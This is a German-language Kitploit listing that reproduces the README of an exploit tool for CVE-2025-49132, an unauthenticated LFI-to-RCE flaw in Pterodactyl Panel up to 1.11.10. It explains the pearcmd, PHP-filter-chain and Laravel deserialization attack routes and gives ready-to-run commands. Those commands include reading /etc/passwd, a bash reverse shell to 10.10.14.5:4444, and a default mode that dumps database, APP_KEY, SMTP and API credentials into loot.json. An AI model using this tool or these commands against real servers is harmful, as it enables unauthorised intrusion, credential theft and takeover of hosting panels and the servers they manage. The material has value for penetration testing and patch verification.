Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49132 — Exploit für Pterodactyl Panel ≤ 1.11.10 - unahentifiziertes LFI zu RCE | Kitploit
Tools/GitHubGitHub/yoyochaud/cve-2025-49132
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubyoyochaud/cve-2025-49132

CVE-2025-49132

Exploit für Pterodactyl Panel ≤ 1.11.10 - unahentifiziertes LFI zu RCE

Repository anzeigen
2513vor 7 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-49132 - Pterodactyl Panel Nicht authentifizierte RCE

root@kitploit:~
  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

Exploit für Pterodactyl Panel ≤ 1.11.10 - nicht authentifizierte LFI zu RCE.

Die Schwachstelle

Der /locales/locale.json-Endpunkt akzeptiert locale- und namespace-Parameter, die ohne Bereinigung oder Authentifizierung direkt an PHPs include() übergeben werden. Der hash-Parameter, der Missbrauch verhindern soll, wird in ungepatchten Versionen nie erzwungen.

Dies ermöglicht:

  • Lokale Dateieinbindung (LFI) - Lesen jeder .php-Konfigurationsdatei (Datenbank-Zugangsdaten, APP_KEY, Mail, Session…)
  • Remote Code Execution (RCE) - Über pearcmd.php-Einbindung (register_argc_argv + config-create-Trick), PHP-Filterketten oder Laravel-Deserialisierung mit dem geleakten APP_KEY

Betroffen: Pterodactyl Panel ≤ 1.11.10 Behoben in: 1.11.11

Warum dieser PoC?

Die ursprünglichen PoCs verwenden Python requests, um das pearcmd-Payload zu senden. Das Problem: requests kodiert Zeichen wie <, >, {, } stillschweigend URL - was die in die URL eingebetteten PHP-Tags (<?=system(...)?>) zerstört.

Dieser Exploit behebt das mit zwei wesentlichen Änderungen:

  1. curl für Stage 1 - Die Payload-Erstellungsanfrage verwendet curl -g (globoff) über subprocess und umgeht so die URL-Kodierung von Python vollständig.
  2. hex2bin() für Befehls-Kodierung - Anstatt den rohen Befehl zu injizieren (der bei Leerzeichen und Sonderzeichen bricht), wird der Befehl hex-kodiert und serverseitig mit system(hex2bin('...')) dekodiert. Hex verwendet nur 0-9a-f - kein +, kein =, kein &, keine Leerzeichen. Somit funktioniert jeder Befehl, einschließlich Reverse Shells mit >& und /dev/tcp/.
  3. Dynamischer PEAR-Pfad - Anders als viele statische Skripte, die /usr/share/php fest verdrahten, unterstützt dieses Tool das --pear-dir-Argument vollständig. Es injiziert den benutzerdefinierten Pfad dynamisch in die rohe curl-Anfrage und ermöglicht so die Ausnutzung von Zielen mit nicht standardmäßigen Konfigurationen.
  4. Alles-in-einem-Automatisierung - Anstatt sich auf separate Skripte für verschiedene Vektoren zu verlassen, automatisiert dieses Tool vollständig die gesamte Angriffsfläche (pearcmd, PHP-Filter, Deserialisierung, LFI .php) und prüft jede Möglichkeit, um den zuverlässigsten RCE-Pfad zu gewährleisten.

Installation

root@kitploit:~
pip install requests

Optional (für Filterketten / Deserialisierungs-RCE-Methoden):

root@kitploit:~
pip install pycryptodome
git clone https://github.com/synacktiv/php_filter_chain_generator

Verwendung

RCE

root@kitploit:~
# Simple command
python3 exploit.py http://panel.fr --rce-cmd "id"

# PHP filter chain (needs php_filter_chain_generator in PATH)
python3 exploit.py http://panel.fr --rce-filter "id"

# Pre-generated filter chain
python3 exploit.py http://panel.fr --rce-filter "id" --filter-chain "php://filter/..."

# Laravel deserialization via leaked APP_KEY (needs phpggc + pycryptodome)
python3 exploit.py http://panel.fr --rce-d "id"

# RCE with another pear directory
python3 exploit.py http://panel.fr --rce-cmd "cat /etc/passwd" --pear-dir /usr/share/php/PEAR

# Reverse shell 
python3 exploit.py http://panel.fr --rce-cmd "/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

Vollständiger Konfigurations-Dump (Standardmodus)

root@kitploit:~
# Dumps all configs (DB creds, APP_KEY, mail, session, CORS…) + attempts auto RCE
python3 exploit.py http://panel.fr

Optionen

OptionBeschreibung
targetZiel-URL (z.B. http://panel.pterodactyl.fr)
--rce-cmd CMDFührt CMD über pearcmd aus (unterstützt jeden Befehl, inkl. Reverse Shells)
--rce-filter CMDFührt CMD über PHP-Filterkette aus
--filter-chain CHAINVerwendet eine vorgefertigte php://filter-Kette (mit --rce-filter)
--rce-d CMDFührt CMD über Laravel-Deserialisierung aus
--pear-dir PATHPfad zum pearcmd.php-Verzeichnis (Standard: /usr/share/php)
--timeout NZeitüberschreitung für Anfragen in Sekunden (Standard: 10)
--verify-sslSSL-Zertifikatsprüfung aktivieren (standardmäßig deaktiviert)
-o FILEAusgabedatei für Bericht (Standard: loot.json)

Häufige --pear-dir-Werte

DistributionPfad
Debian / Ubuntu/usr/share/php (Standard)
openSUSE/usr/share/php/PEAR
Alpine/usr/share/php84 oder /usr/share/php83
RHEL / Rocky/usr/share/pear

Was der Standardmodus ausgibt

Wenn ohne --rce-cmd / --rce-filter / --rce-d ausgeführt, führt der Exploit eine vollständige Konfigurationsextraktion durch:

  • Datenbank - MySQL-Host, Port, Benutzer, Passwort, Datenbankname + Redis-Konfiguration
  • Anwendung - APP_KEY (→ Laravel-Deserialisierung), Version, Umgebung, Debug-Modus
  • Pterodactyl - Panelspezifische Einstellungen, 2FA-Konfiguration, Feature-Flags
  • Session - Treiber, Cookie-Konfiguration, Verschlüsselungseinstellungen
  • Authentifizierung - Sperrkonfiguration, Ablauf der Passwortzurücksetzung
  • Dienste - Externe API-Schlüssel (Mailgun, Postmark, usw.)
  • Mail - SMTP-Zugangsdaten, Mailer-Konfiguration
  • Queue / Cache / Hashing / CORS / Logging / Dateisysteme
  • Sensible Dateien - Versucht /etc/passwd, Hostname, Kernelversion zu lesen

Ein vollständiger JSON-Bericht wird in loot.json gespeichert (oder benutzerdefinierter Pfad über -o).

Danksagungen

Dieser Exploit ist eine Verbesserung basierend auf dem PoC von GRodolphe/CVE-2025-49132_poc, der selbst vom ursprünglichen PoC von 0xtensho/CVE-2025-49132-poc inspiriert wurde.

Tool herunterladen